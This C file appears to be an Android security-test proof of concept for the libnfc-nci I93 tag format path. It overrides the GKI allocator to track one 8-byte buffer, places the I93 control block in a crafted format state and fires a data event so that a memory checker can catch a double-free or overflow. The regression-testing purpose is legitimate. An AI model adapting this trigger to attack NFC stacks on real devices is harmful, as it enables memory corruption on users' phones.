1 /*
2  * Copyright (C) 2021 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <stdlib.h>
18 #include <nfc_api.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include <tags_defs.h>
22 
23 #include "../includes/common.h"
24 #include "../includes/memutils.h"
25 
// Switch consulted by the allocator overrides in ../includes/memutils.h
// (presumably; confirm there): ENABLE_ALL while the PoC body runs,
// ENABLE_NONE around it.  Set and cleared by main().
char enable_selective_overload = ENABLE_NONE;

// borrowed from rw_i93.cc -- the allocation size this test tracks in
// GKI_getbuf()/GKI_freebuf() below.
#define RW_I93_FORMAT_DATA_LEN 8

// Control blocks owned by libnfc-nci; main() writes their state directly.
extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;
void rw_init(void);
tNFC_STATUS rw_i93_select(uint8_t* p_uid);
// The most recent buffer of RW_I93_FORMAT_DATA_LEN bytes handed out by
// GKI_getbuf(); the only pointer GKI_freebuf() will release.
void* vulnerable_ptr;
36 
/*
 * Test override of the GKI pool allocator.  Every request is served by
 * malloc(); the most recent buffer of exactly RW_I93_FORMAT_DATA_LEN bytes is
 * remembered in vulnerable_ptr so that GKI_freebuf() can recognise it.
 *
 * The malloc() result is returned unchecked, NULL included; the library code
 * that calls this is responsible for handling that.
 */
void* GKI_getbuf(uint16_t size) {
    void* buf = malloc(size);
    if (size != RW_I93_FORMAT_DATA_LEN) {
        return buf;
    }
    vulnerable_ptr = buf;
    return buf;
}
44 
/*
 * Test override of the GKI pool release.  Only the buffer recorded by
 * GKI_getbuf() is handed to free(); any other pointer is ignored and its
 * malloc() block leaks -- presumably because the library also releases
 * buffers this override never allocated (confirm against the GKI call sites).
 * vulnerable_ptr is deliberately not cleared afterwards, so a repeated release
 * of the same pointer still reaches free() instead of being masked here.
 */
void GKI_freebuf(void* p_buf) {
    if (p_buf != vulnerable_ptr) {
        return;
    }
    free(p_buf);
}
50 
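/*
 * PoC driver: brings up the reader/writer layer, parks the I93 control block
 * in RW_I93_STATE_FORMAT / RW_I93_SUBSTATE_CHECK_READ_ONLY with block_size set
 * to I93_MAX_BLOCK_LENGH - 1, and delivers a single NFC_DATA_CEVT through the
 * RF connection callback.  GKI_getbuf()/GKI_freebuf() above track the
 * RW_I93_FORMAT_DATA_LEN byte buffer the library allocates on that path.
 *
 * Returns EXIT_FAILURE when setup (select, callback lookup or allocation)
 * fails, EXIT_SUCCESS otherwise.  The outcome of interest is what the memory
 * checker this test runs under observes during the callback, not the return
 * value.
 */
int main(void) {
    enable_selective_overload = ENABLE_ALL;
    tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;

    GKI_init();
    rw_init();

    /* rw_i93_select() reads a whole UID from p_uid (I93_UID_BYTE_LEN bytes in
     * rw_i93.cc -- confirm), not a single byte.  The original passed the
     * address of one uint8_t, letting the callee read past it on the stack;
     * size the buffer to the UID length instead.  Only the first byte is
     * non-zero, as before. */
    uint8_t uid[I93_UID_BYTE_LEN] = {1};
    if (rw_i93_select(uid) != NFC_STATUS_OK) {
        return EXIT_FAILURE;
    }

    tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
    /* rw_i93_select() is expected to have installed the data callback; bail
     * out rather than call through a null pointer if it did not. */
    if (p_cb->p_cback == NULL) {
        return EXIT_FAILURE;
    }
    tNFC_CONN_EVT event = NFC_DATA_CEVT;

    /* Casts on malloc() kept on purpose: this file may also be built as C++. */
    tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
    if (!p_data) {
        return EXIT_FAILURE;
    }

    /* NOTE(review): only the header is allocated and its fields are left as
     * malloc() returned them, so whatever the callback reads from the
     * response is unspecified.  Kept as in the original; zero-filling it
     * would make the test deterministic but might change the path the
     * callback takes -- confirm before changing. */
    p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
    if (!(p_data->data.p_data)) {
        free(p_data);
        return EXIT_FAILURE;
    }

    p_i93->state = RW_I93_STATE_FORMAT;
    p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
    p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
    p_data->status = NFC_STATUS_OK;

    /* A stack-resident timer entry is linked into the global quick-timer
     * queue (presumably so the library sees a non-empty queue).  It is never
     * unlinked, which is only acceptable because the process exits right
     * after.  `= {0}` rather than `= {}`: the empty initializer is not C11. */
    TIMER_LIST_ENT pFirst = {0};
    nfc_cb.quick_timer_queue.p_first = &pFirst;

    /* Deliver the event; conn_id 0 is what the original used. */
    p_cb->p_cback(0, event, p_data);
    free(p_data->data.p_data);
    free(p_data);
    enable_selective_overload = ENABLE_NONE;
    return EXIT_SUCCESS;
}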
90